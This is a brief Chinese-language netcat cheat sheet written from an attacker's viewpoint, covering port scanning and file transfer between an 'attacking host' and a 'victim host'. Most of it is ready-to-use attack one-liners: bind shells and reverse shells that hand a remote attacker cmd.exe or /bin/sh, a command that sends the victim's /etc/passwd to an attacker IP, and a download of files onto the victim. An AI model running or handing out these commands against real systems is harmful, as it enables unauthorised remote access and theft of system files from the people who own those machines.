github源地址 可能有病毒
教程:这里
基本用法
1. 端口扫描:
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002
扫描192.168.1.1的5000-6000端口,网络超时的时间设为5秒
注意超时时间的单位是秒不是毫秒,另外nc这个用法的扫描效率远不及nmap
2.正向连接
被攻击主机的需要是完整版的nc,有些版本的nc没有-e这个参数。
nc -l -p port -e cmd.exe #被攻击主机如果是windows
nc -l -p port -e /bin/sh #被攻击主机是linux
攻击者连接方式很简单:
nc ip port
3.反向连接
攻击主机先开始监听端口:
nc -vv -l -p port
被攻击主机连接攻击者监听的端口:
nc -e cmd.exe ip port #被攻击主机如果是windows
nc -e /bin/sh ip port #被攻击主机是linux
4.传送文件
攻击主机先开始监听:
nc -d -l -p port > tmp
被攻击主机再开始传送文件:
nc attack_ip port < /etc/passwd
5.下载文件
攻击主机先开始监听:
nc -d -l -p port < tmp
被攻击主机再开始下载文件:
nc attack_ip port > tmp